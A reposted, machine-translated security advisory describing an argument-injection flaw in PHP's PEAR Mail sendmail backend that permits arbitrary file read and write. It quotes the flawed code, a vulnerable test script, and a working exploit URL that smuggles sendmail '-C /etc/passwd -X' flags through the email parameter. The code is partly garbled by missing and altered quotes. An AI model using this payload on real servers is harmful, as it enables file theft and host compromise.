Arbitrary File read/write vulnerability in php pear mail package

Source: Internet
Author: User

Vulnerability Description: PEAR is the official open-source class library of PHP, short for PHP Extension and Application Repository. PEAR compiles common functions in PHP program development into class libraries, covering page presentation, database access, file operations, data structures, cache operations, network protocols, and many other aspects, you can use it easily. It is a code repository for PHP extensions and applications. In short, PEAR is the cpan of PHP. However, 80sec found that the Pear Mail module has a security vulnerability. In some cases, users may read and write arbitrary files in the operating system on the host with the webserver permission, and then control the host to execute php code.
Vulnerability analysis: the PEAR Mail package uses escapeShellCmd to incorrectly filter user parameters passed into the sendmail command. After you submit a specially crafted parameter, you can call other sendmail parameters, you can read and write arbitrary files on the operating system.


Sendmail.php

......
if (!isset($from)) {
return PEAR::raiseError(No from address given.);
} elseif (strpos($from, ) !== false ||
strpos($from, ;) !== false ||
strpos($from, &) !== false ||
strpos($from, `) !== false) {
return PEAR::raiseError(From address specified with dangerous characters.);
}

$from = escapeShellCmd($from);
$mail = @popen($this->sendmail_path . (!empty($this->sendmail_args) ? . $this->sendmail_args : ) . " -f$from -- $recipients", w);
if (!$mail) {
return PEAR::raiseError(Failed to open sendmail [ . $this->sendmail_path . ] for execution.’);
}
……

We can see that the $ from variable is not completely filtered. Because escapeShellCmd will replace the equal character with null, it can bypass the space check, while escapeshellcmd does not check the parameter call, therefore, security vulnerabilities may occur.

Vulnerability Testing:


<?php
ini_set(include_path,ini_get(include_path).:/usr/local/lib/php/PEAR:);
require_once("Mail.php");
$from = "From: " . $_REQUEST[email] . “”;
$to = “xxxxxxx@zzzz.com”;
$subj = “subscription request”;
$body = “subscribe me”;
$hdrs = array(
“To” => $to,
“Cc” => $cc,
“Bcc” => $bcc,
“From” => $from,
“Subject” => $subject,
);
$body=”test”;
$mail =& Mail::factory(’sendmail’);
$mail->send($to, $hdrs, $body);
?>

Http://www.80sec.com/index.php? 1 = 3 & email = xxxxx % 09-C % 09/etc/passwd % 09-X % 09/tmp/wokao % 09zzz @ x % 09.com& l = 2 & 1 = 3

You can see the exploitation of this vulnerability.

Vulnerability impact: All PEAR Mail function packages
Vulnerability status: official notification

The content on this site is original. For reprinted content, be sure to keep your signatures and links!
Html "> Arbitrary File read/write vulnerability in php pear mail package: Http://www.80sec.com/php-pear-mail-package-security-hol.html

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.